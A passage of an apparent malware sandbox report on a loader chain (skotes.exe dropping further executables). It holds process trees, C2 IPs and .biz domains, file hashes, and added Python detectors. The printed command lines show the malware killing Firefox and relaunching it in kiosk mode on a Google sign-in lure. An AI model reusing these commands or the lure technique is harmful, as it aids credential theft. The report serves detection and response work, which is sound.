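from collections import Counter

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = TEMP + r"\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"
SKOTES = TEMP + r"\abc3bc1985\skotes.exe"
LOADER = TEMP + r"\1012592001\53cf2003b2.exe"
TASKKILL = r"C:\Windows\SysWOW64\taskkill.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
LURE = "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd"

# Repeated rows are kept as the sandbox prints them, one per write call.
WPM_ROWS = [
    f"PID 3020 wrote to memory of 2808 N/A {SAMPLE} {SKOTES}",
    f"PID 3020 wrote to memory of 2808 N/A {SAMPLE} {SKOTES}",
    f"PID 2808 wrote to memory of 1976 N/A {SKOTES} {LOADER}",
    f"PID 1976 wrote to memory of 2156 N/A {LOADER} {TASKKILL}",
    f"PID 1976 wrote to memory of 2772 N/A {LOADER} {FIREFOX}",
    f"PID 2772 wrote to memory of 2320 N/A {FIREFOX} {FIREFOX}",
]

# Command lines from the Processes section; the PID pairing is an assumption.
CMDLINES = {
    3020: f'"{SAMPLE}"',
    2808: f'"{SKOTES}"',
    1976: f'"{LOADER}"',
    2156: "taskkill /F /IM firefox.exe /T",
    2772: f'"{FIREFOX}" --kiosk "{LURE}" --no-default-browser-check --disable-popup-blocking',
    2320: f'"{FIREFOX}" --kiosk {LURE} --no-default-browser-check --disable-popup-blocking',
}

# Image paths may contain spaces ("Program Files"); each one starts with a
# drive letter, so the non-greedy source path stops at the first " X:\".
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_image>[A-Za-z]:\\.*?) (?P<dst_image>[A-Za-z]:\\.*)$")


def build_tree(rows):
    """Return (child -> parent PID, PID -> image path, write count per edge)."""
    parents, images, writes = {}, {}, Counter()
    for row in rows:
        m = ROW_RE.match(row)
        if m is None:
            raise ValueError(f"unparsed row: {row!r}")
        src, dst = int(m["src"]), int(m["dst"])
        parents[dst] = src
        images[src], images[dst] = m["src_image"], m["dst_image"]
        writes[(src, dst)] += 1
    return parents, images, writes


def basename(path):
    return path.rsplit("\\", 1)[-1]


def ancestry(pid, parents, images):
    """Image names from the root of the tree down to pid."""
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]])
    return [basename(images[p]) for p in reversed(chain)]


BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
KILL_RE = re.compile(r"\btaskkill\b.*?/IM\s+(\S+)", re.I)
KIOSK_RE = re.compile(r'--kiosk\s+"?(\S+?)"?(?:\s|$)')
SIGNIN_RE = re.compile(r"signin|login|challenge/pwd", re.I)


def suspicious(cmdline):
    """Reason a command line is interesting, or None."""
    m = KILL_RE.search(cmdline)
    if m and m.group(1).lower() in BROWSERS:
        return f"force-kills browser {m.group(1)}"
    m = KIOSK_RE.search(cmdline)
    if m and SIGNIN_RE.search(m.group(1)):
        return f"kiosk-mode browser pinned to a sign-in URL: {m.group(1)}"
    return None


def findings(rows=WPM_ROWS, cmdlines=CMDLINES):
    """Suspicious command lines with their ancestry, ordered by PID."""
    parents, images, _ = build_tree(rows)
    out = []
    for pid, cmd in sorted(cmdlines.items()):
        reason = suspicious(cmd)
        if reason:
            out.append({"pid": pid, "chain": ancestry(pid, parents, images),
                        "reason": reason})
    return out


if __name__ == "__main__":
    for f in findings():
        print(f'{f["pid"]}: {" > ".join(f["chain"])}\n    {f["reason"]}')
```

On this sample the kiosk hit resolves to sample > skotes.exe > 53cf2003b2.exe > firefox.exe > firefox.exe, which is the chain a responder would want alongside the raw URL; the same two rules fire on the real process list because the browser image names and the --kiosk flag are taken from the command lines, not from PIDs.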

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
N/A 127.0.0.1:49306 tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.204.78:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.204.78:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.46:443 consent.youtube.com tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 consent.youtube.com udp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
N/A 127.0.0.1:49333 tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
NL 92.63.197.221:80 tcp
NL 92.63.197.221:80 tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 142.250.200.46:443 consent.youtube.com udp
NL 92.63.197.221:80 tcp
NL 92.63.197.221:80 tcp
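The connection list above is dominated by the sandbox's own Firefox session (Mozilla remote-settings and update endpoints, Google and YouTube consent pages, Steam, the OpenH264 download), which buries the few destinations that can be attributed to the sample. The Python below is an added example, not part of the report and not any sandbox vendor's tooling: it parses rows in the `CC ip:port [domain] proto` form printed above, drops loopback traffic and the sandbox's background domains, and separates names that were only looked up from endpoints that were actually contacted. The allowlist (`NOISE_SUFFIXES`) and the resolver address are assumptions to tune for your own sandbox image; the sample rows are a subset copied from the table.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a subset of rows copied from the connection table above.
SAMPLE_ROWS = """
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 consent.youtube.com tcp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
N/A 127.0.0.1:49333 tcp
US 8.8.8.8:53 impend-differ.biz udp
GB 23.214.143.155:443 steamcommunity.com tcp
NL 92.63.197.221:80 tcp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
NL 92.63.197.221:80 tcp
"""

# Assumption (not from the report): background traffic of the sandbox's own Firefox
# session and Windows image. Tune per sandbox image; unmatched destinations are kept.
NOISE_SUFFIXES = (
    ".mozilla.net", ".mozilla.org", ".mozgcp.net", ".google.com", ".youtube.com",
    ".gvt1.com", ".akamai.net", ".openh264.org", "steamcommunity.com",
)
RESOLVER = "8.8.8.8:53"  # sandbox resolver: rows to it are lookups, not contacts

ROW_RE = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)\s+(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)

@dataclass(frozen=True)
class Conn:
    cc: str
    ip: str
    port: int
    domain: Optional[str]  # None for bare-IP connections
    proto: str

def parse_rows(text: str) -> List[Conn]:
    """Parse 'CC ip:port [domain] proto' rows as printed in the report."""
    conns = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError("unparseable row: %r" % line)
        conns.append(Conn(m["cc"], m["ip"], int(m["port"]), m["domain"], m["proto"]))
    return conns

def is_noise(c: Conn) -> bool:
    """Loopback and known sandbox background traffic; never shipped as IOCs."""
    if c.ip.startswith("127."):
        return True
    if c.domain is None:
        return False
    d = c.domain.lower()
    return any(d == s.lstrip(".") or d.endswith(s) for s in NOISE_SUFFIXES)

def triage(text: str) -> Dict[str, List[str]]:
    """Bucket the remaining rows: names only looked up, resolved endpoints, bare IPs."""
    out: Dict[str, List[str]] = {"dns_only": [], "endpoints": [], "bare_ips": []}
    seen = set()
    for c in parse_rows(text):
        if is_noise(c):
            continue
        if "%s:%d" % (c.ip, c.port) == RESOLVER and c.domain:
            out["dns_only"].append(c.domain)
            continue
        key = "%s:%d/%s" % (c.ip, c.port, c.proto)
        if key in seen:  # the report prints one row per connection; keep each endpoint once
            continue
        seen.add(key)
        if c.domain is None:
            out["bare_ips"].append(key)
        else:
            out["endpoints"].append("%s -> %s" % (c.domain, key))
    # A name is "DNS only" when no row shows a connection to it afterwards.
    resolved = {e.split(" -> ")[0] for e in out["endpoints"]}
    out["dns_only"] = sorted({d for d in out["dns_only"] if d not in resolved})
    return out

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_ROWS).items():
        print(bucket, items)
```

On the rows above this leaves one contacted name (`print-vexer.biz`), one name that was resolved but never connected to (`impend-differ.biz`) and one bare-IP endpoint (`92.63.197.221:80`); a DNS-only name is still worth keeping as a weaker indicator, since the connection may simply have fallen outside the 156 s network window.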

Files

memory/3020-0-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-1-0x0000000077070000-0x0000000077072000-memory.dmp

memory/3020-2-0x0000000000A81000-0x0000000000AAF000-memory.dmp

memory/3020-3-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-4-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-5-0x0000000000A80000-0x0000000000F2F000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 f25ddb78a2cc3b6442c52a3c4a2aa843
SHA1 52ba6df84b158bf917044fee22625d2a12202382
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
SHA512 74c7900f42e3d9b5d490e4848c7d12832f14b245065e04baa96604f2ca91ea5e46318ea71e081ee266fc770a94413edc298516abf23ed9f6c7cd6e7a70b72f14

memory/3020-11-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/2808-21-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/3020-19-0x0000000000A80000-0x0000000000F2F000-memory.dmp

memory/3020-22-0x0000000006E20000-0x00000000072CF000-memory.dmp

memory/2808-23-0x0000000000B01000-0x0000000000B2F000-memory.dmp

memory/2808-24-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-26-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-27-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

memory/2808-44-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-45-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/2808-48-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-47-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/2820-46-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-49-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-50-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2808-51-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe

MD5 bd8e9783c400bd3e1062102ea7efc071
SHA1 5de634ac724beb913fc431da4474635969ef4579
SHA256 5892cf800275fb41ba0b88395a14bd8d1ddf35d7bbcdb0e064f7bec4b2eaa894
SHA512 84202fd36089564b54d010ac30508f8e97970802bfc0d87c4957c85f02b82fd4411f776dd1e44d5e78cc91ce9d00651341d69d2bc9f0c17bcc46d4fdf928bfaf

memory/1156-66-0x0000000000120000-0x00000000005C5000-memory.dmp

memory/2808-64-0x0000000006990000-0x0000000006E35000-memory.dmp

memory/2808-69-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/2820-70-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe

MD5 f18df05d8617aecd511f2074dd84843c
SHA1 9203a2f1b90425ab15b5ca0785b9a406dd9ed37f
SHA256 c898a6d03e65d0e212cca04c6035c9c9a23cfe504f7e72179746709b0a12889a
SHA512 57c729f1f8b4956825e35a153b0a421324a284e688702da43a11eb2cb092aea46cd730e8099d633c54b3b0c212ce8d0a6dcb0a0b12aa4095105c4fb70b89caf1

memory/2808-88-0x0000000006990000-0x0000000006E8A000-memory.dmp

memory/2808-87-0x0000000006990000-0x00000000071F2000-memory.dmp

memory/1320-89-0x0000000000990000-0x0000000000E8A000-memory.dmp

memory/2808-91-0x0000000006990000-0x0000000006E8A000-memory.dmp

memory/2820-90-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-93-0x0000000006990000-0x0000000006E35000-memory.dmp

memory/2808-92-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/1320-95-0x0000000000990000-0x0000000000E8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe

MD5 4a113390d43e07f23b940f5395802b01
SHA1 7451bb1a01bb006b6a69449c45310c23a79ad900
SHA256 cf265dc6c405c9d0b3e48728139c6dac24a04840091a315c34b8f7852a2f517b
SHA512 b37c7a7eea7a992f363b8a58f069b13f4c8936f8cc2037e86c57fa5b56b3a7195d7816fd91db6e14f2bdbda30898e374b6dcc839adb94c475a7c19f50f9f9f02

memory/1156-104-0x0000000000120000-0x00000000005C5000-memory.dmp

memory/1156-111-0x0000000000120000-0x00000000005C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe

MD5 159fd820eec2647575a520c273e83c4c
SHA1 83d9f35adee5e6129083df1c035840e796496faa
SHA256 49bf2a693d8813f89a4cbea5e6d76f032f6120a40b5ccfb0d439f0eb23e24b39
SHA512 5fbc084b754c573147583c5be13a32f0a138a0e3b63edf5eedb8993c21585a32ed015e6eb564d411c90147789603a1a1b0532882394d1f2d39604b1260bef2ee

memory/2808-125-0x0000000006990000-0x0000000006C4C000-memory.dmp

memory/2924-132-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2808-131-0x0000000006990000-0x0000000006E8A000-memory.dmp

memory/2924-137-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2924-138-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\6eeb6934-d80f-4f0c-9497-b125dcd74e3c

MD5 4523cd8742530064ddc1d6fd41d80ded
SHA1 10b3ba9d147969bc996d290c885d3ebb56451dd1
SHA256 b7a463ce6bf51e273da151613e4a03fe3d4a24bac48913050b7293056827996b
SHA512 f6e5d1f79a0113226a4079ed64d9ee92c962a91f8f41515aaac6da1a946423eaf511c28676ea966d7b75286f7277b338a4906feca94d31a44bea289cd5caacf0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 04c77941c36f2f13f1a4f2fded82b36a
SHA1 c6c4ad3c2c75331bcdb30008daeccb2de548f2d3
SHA256 de01abe3b6ffed4516b2a97aae89ce5f6eaf4acfbeac9114c8fff9ff726d75de
SHA512 68799da3db17699d0dca6b935044b99f98e1a5d56c305cc060abfba8fb6525dab11e4b07fe55ab55aeea7ff3f39eaa836d80a64295b6ed314d78217165ba4b30

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 40c282cf99db16623bc3eb6030da670d
SHA1 0a122287288716f51ba653e330051feebe1c2fee
SHA256 9935e6223ef9f29396ab7c6e08e6eb8efed478663bbdcc9c3260eac531946b4c
SHA512 806d00fa30622c6aeab5d26918428ad627cdb04544ac0420ac608f8599055bf5dbed68074313f93328015f3e29aacedbcc1761de7e106de1207a8c2ca53b6bd1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 b182349cdb981b524cc45a1945f61b5f
SHA1 f1b943220cd1f2ff7b423f14aecd3fb1a4c8810e
SHA256 e65a7bf35918530919cba715b96521343c7d5410ffe2634170ae46c1f9954803
SHA512 cec467faf8f279ae2b04d2c05c310f9ef5ab46458bb02526e0155238d5c868e3ba76c0d27c8a4d0df20209e618e5ee0f3dabf39727eec198e262d0c3bce1477e

memory/2820-259-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-277-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab16BE.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar16FF.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1156-313-0x0000000000120000-0x00000000005C5000-memory.dmp

memory/2808-319-0x0000000006990000-0x0000000006C4C000-memory.dmp

memory/2924-321-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2924-329-0x0000000000BE0000-0x0000000000E9C000-memory.dmp

memory/2820-330-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-331-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4

MD5 49386863aae18ad8845d2b68861000c3
SHA1 83d029bdf86447f57a8c63a3f3acfd0e942e569a
SHA256 f96893c12059c5fa84191e3e3947dafe3505fba98e88abe42f0811d1c2a4c7e5
SHA512 7c61fc5a8fb07cb668aafad014894cf0c5bf2fee90639f23ff3ebdc9784202c3fcb3abcef2cbf9c3f07e0217997090a2e7f497eaf1f4c7b809b3ed4ec7e0d2ca

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 3bdbe154c2d5e5e8af755e5aff6db91b
SHA1 b8a1d1b357105d934fd908492e5ca109a9d594dc
SHA256 f3e0193b231fb43cdb7540ab7b48b80ec994694434340df55f7027b192031f47
SHA512 e5d4ea1f0e26404f2db9ecaeedb092f81dc0acaca1f956072f13939215819333bf220647f87fb815ec9bdcdaa4d9469d21343db2d402b46f948437fe817f8f0e

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

memory/2820-367-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

memory/2808-392-0x0000000000B00000-0x0000000000FAF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 90fbfe935c6d71b18efc1594c552eac7
SHA1 c48af567fb31cf76dd737479f9253d5c79e58a83
SHA256 a0dfd17424e9994051ed3744fc600d1712a082fa100ba2da7c3b348d4824db06
SHA512 97fd7245197c362325c4f7c79f7c8a25b90b1363f0289296a96272617be1f5c48e6286f2d59d938e8ea7863a00232ad448187292d32ec12ed32be628e9e1bdfd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 a6930b1f3a11cd4d90b521e3616792ad
SHA1 b36891b8ce86382a5c5b13076b17af15f238d0cd
SHA256 eeb137d3b8d5ca8c3e1f51bac7e018b2f70b333a1bfe3eb4ba8dd50b6738a6a0
SHA512 e8b4ffc57cfe95a38dd01b933efbed6e22f8324615a997a178c58f78d79ec4132ea8cfed34415f0424432a7053668a9d8876b210c89d32e495f1ec7e44d5c937

memory/2808-429-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-430-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-432-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-433-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-434-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-435-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-446-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-447-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-448-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-449-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2808-450-0x0000000000B00000-0x0000000000FAF000-memory.dmp

memory/2820-451-0x0000000000400000-0x0000000000C62000-memory.dmp

